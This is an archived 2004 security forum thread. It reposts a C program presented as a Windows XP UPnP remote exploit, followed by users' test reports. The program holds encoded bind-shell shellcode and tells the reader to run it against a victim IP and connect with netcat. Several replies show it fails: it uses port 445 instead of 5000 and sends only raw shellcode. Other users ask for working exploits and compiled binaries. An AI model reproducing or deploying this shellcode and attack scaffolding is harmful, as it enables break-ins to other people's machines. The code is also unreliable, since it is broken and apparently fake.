Windows Xp Upnp Exploit Argoxp.c

Full Version: Windows Xp Upnp Exploit Argoxp.c

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

Jun 24 2004, 11:08 PM

QUOTE

***************** EXPLOIT CODED BY JOCANOR *****************

this is a new and functional exploit for de vulnerability
affects to windows xp, at the service UPNP, port 5000.

this exploit is a part of ASQ12 project, same as XPhack.c coded
also be me...

you only type:

argoxp victimip

and later, in another cmd type:

nc victimip 1981

note:

you need netcat.

note2:

this exploit affects to windows xp + sp0 english version.

***************** EXPLOIT CODED BY JOCANOR *****************

*/
#include <stdio.h>
#include <windows.h>

#pragma comment(lib, "ws2_32")

char shell[] = //bind port 1981
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x99\x98\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
"\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
"\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
"\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
"\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
"\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
"\xE5\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
"\x9D\xC0\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66"
"\xCE\x69\x12\x41\x5E\x9E\x9B\x99\x9E\x24\xAA\x59\x10\xDE\x9D\xF3"
"\x89\xCE\xCA\x66\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66"
"\xCE\x65\x1A\x75\xDD\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B"
"\x62\x10\xDF\xA1\x10\xDF\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99"
"\x99\x14\xDE\x89\xC9\xCF\xCA\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5"
"\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xCA\x66\xCE\x7D\xC9\x66\xCE\x71"
"\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32"
"\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6"
"\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9"
"\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA"
"\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8"
"\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC"
"\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8"
"\xFA\xFA\xFC\xE9\xED\x99";

int main(int argc, char *argv[])

{

char recvbuf[1600];
char szRequest[2048];
char szJmpCode[281];
char szExeCode[840];
int i;
WSADATA wsa;
struct hostent *he;
struct sockaddr_in their_addr;
int len, sockfd;
short dport = 445;

printf("\n ArgoXP 1.0 beta \n");
printf(" ExPlOiT CoDeD By: JoCaNoR \n");
printf("Member of: SlackTeam...Jocanor, nkde, zet4 & zerok\n");
printf(" .-.-.Especial thanks to Neo_geno & Lide.-.-.\n\n");

if (argc < 2)
{
printf("How to use: ");
printf("Argoxp <victim ip>\n\n");
exit(0);
}

for(i=0; i<268; i++) szJmpCode[i]=(char)0x90;

szJmpCode[268]=(char)0x4D; szJmpCode[269]=(char)0x3F;
szJmpCode[270]=(char)0xE3; szJmpCode[271]=(char)0x77;
szJmpCode[272]=(char)0x90; szJmpCode[273]=(char)0x90;
szJmpCode[274]=(char)0x90; szJmpCode[275]=(char)0x90;

szJmpCode[276]=(char)0xFF; szJmpCode[277]=(char)0x63;
szJmpCode[278]=(char)0x64; szJmpCode[279]=(char)0x90;
szJmpCode[280]=(char)0x00;

for(i=0; i<32; i++) szExeCode[i]=(char)0x90;
szExeCode[32]=(char)0x00;

strcat(szExeCode, shell);
sprintf(szRequest, "%s%s\r\n\r\n", szJmpCode, szExeCode);

WSAStartup(MAKEWORD(2,0),&wsa);

if ((he=gethostbyname(argv[1])) == NULL)
{
perror("Unable to resolve");
exit(1);
}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket error");
exit(1);
}

their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(dport);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);

printf("Waiting for connection...");
if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
printf("\nError, unable to connect!!!");
exit(1);
}

printf("Connected!!!\n");

if (send(sockfd, shell, sizeof(shell)-1, 0) == -1)
{
printf("Error :(:(:(\n");
exit(1);
}

printf("OoOoOps shell!!\n");
len = recv(sockfd, recvbuf, 1600, 0);

return 0;

}

//***************** EXPLOIT CODED BY JOCANOR *****************

Source: http://seclists.org/lists/bugtraq/2004/Jun/0405.html

TRi

Jun 24 2004, 11:42 PM

Hey nice, thanks for the info. Will try to compile and test this soon

slynx

Jun 24 2004, 11:43 PM

Has anyone tested this exploit? Sorry but I'm a little skeptical...there have been
a lot of fake UPNP exploits, and it kinda got to me.....

If I have any results with this I will share. Thanks for posting.

UPDATE: wow....i can't believe it compiled w/ 0 errors.... (lmao)

UPDATE: This code is somewhat bogus. First of all, there is a recv() called after
sending the 'exploit', which just hangs the connection for no apparent reason. Of
course, there might actually be a reason for that....but there isn't a reason for
creating szRequest and then sending shell when shell is just the shellcode for a
bind..... (???) Also, I don't see any of the UPNP protocol request being made (like
NOTIFY...) of course I might be wrong on all of this.... I don't have a box running
XP w/ SP0 so I can't test it....can anybody here have an SP0 box for testing?

TRi

Jun 25 2004, 12:15 AM

This is indeed kinda odd for me too.
I tried it on my machines because that didnt work i tried some other machines with no outcome.

If anybody got an successfull attempt with it, please tell us, because i wonder if this thingy works at all

EXPLOiTED

Jun 25 2004, 01:25 AM

i got a test box. Can you upload hte compiled exe. i get compile errors

mortello

Jun 25 2004, 01:51 AM

I septical....I see a dport = 445....

but 445 isn't the upnp port....so it may be me that doesn't understand the code (which could be because I am not an expert in c/c++ but more in Java)

but anyway I found that part strange....and I believe its called by htons, which normally is used to connect to an IP....

twistedps

Jun 25 2004, 02:08 AM

yeh it doesnt even call port 5000... wtf... im gonna stay away from this, god knows what lies in that shellcode.

stonebreaker

Jun 25 2004, 03:30 AM

this exploit is too old.
most machine hava pached

Basti

Jun 25 2004, 08:11 AM

is there a possibility to add bindshell? cause typing nc ip 1981 4 all ips suck :-/

Ecko

Jun 25 2004, 09:25 AM

succesfull compiled with VC++

*edit*

didn't worked 4 me

ArgoXP 1.0 beta
ExPlOiT CoDeD By: JoCaNoR
Member of: SlackTeam...Jocanor, nkde, zet4 & zerok
.-.-.Especial thanks to Neo_geno & Lide.-.-.

Waiting for connection...Connected!!!
OoOoOps shell!!

but no succesfull connectin with nc!

*edit2*

@stonebreaker

read the first lines of the source:

QUOTE

***************** EXPLOIT CODED BY JOCANOR *****************

this is a new and functional exploit for de vulnerability
affects to windows xp, at the service UPNP, port 5000

320X

Jun 25 2004, 10:28 AM

Yea Ecko is right, i compile with the vc++ and that´s the result
ArgoXP 1.0 beta
ExPlOiT CoDeD By: JoCaNoR
Member of: SlackTeam...Jocanor, nkde, zet4 & zerok
.-.-.Especial thanks to Neo_geno & Lide.-.-.

Waiting for connection...Connected!!!
OoOoOps shell!!

WINXP

nc 192.168.0.1 1981

nc refuse it

som3aa

Jun 25 2004, 12:04 PM

could someone compile it plz?

ComSec

Jun 25 2004, 12:34 PM

@som3aa

READ the rules.... NO compile this requests !!!! either you can or you cannot do it !

about time some of you learned how to !!!

SkyRaVeR

Jun 25 2004, 12:38 PM

This is non working xploit..
pnp-port is 5000 like mentioned before.. 445 is rpc-port..

even when the msg "OoOoOps shell!!" appears the xploit just said that it send its "xploit code" so thats all..
Just forget 'bout it - you'll never get a shell with this code !

so far, sky

UnDeRTaKeR

Jun 25 2004, 12:51 PM

any good working upnp exploit that still works? :\

TheOther

Jun 25 2004, 03:01 PM

Great job, qcred11!!

On what is this vulnerabilty based? MS0?-??

nuorder

Jun 25 2004, 06:15 PM

QUOTE (TheOther @ Jun 26 2004, 01:01 AM)

Great job, qcred11!!

On what is this vulnerabilty based? MS0?-??

QUOTE

Microsoft Security Bulletin MS01-059
Unchecked Buffer in Universal Plug and Play can Lead to System Compromise

Originally posted: December 20, 2001
Updated: May 09, 2003

very old - pre sp1, but still interesting

i just ran this through the works, apimonitor, file system call monitor, packet log, process viewers, etc. it seemed to use the standard dlls like winsock and the ldap one and sent 5 packets across the network to the specified target (patched tho cos i dont have xp pre-sp1) when initially run
the packets didnt seem to contain any meaningful info as to what it was sending tho - probly just its shellcode

slynx

Jun 25 2004, 10:15 PM

First of all, the exploit is fake. Second, if you wanted it to send anything but it's
shellcode, you need to modify it (see previous post)

nuorder

Jun 26 2004, 01:14 AM

agreed, and it doesnt do anything its not supposed to either

MasterWeb

Jun 27 2004, 07:47 AM

i think The Exploit is Fake , i Tested this exploit on 6 machine !

Basti

Jun 27 2004, 05:17 PM

look at the source code.. a n00b would see thats fake

ivan288

Jun 28 2004, 08:59 PM

QUOTE

short dport = 445;

thats simply wrong!
anyone should know how to fix that

tibbar

Jun 29 2004, 11:08 PM

this ones in te bugtraq archives, http://www.securityfocus.com/archive/1/367061 but i agree its fake.

the port 445 instead of 5000 is wrong. dont waste your time on this one.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.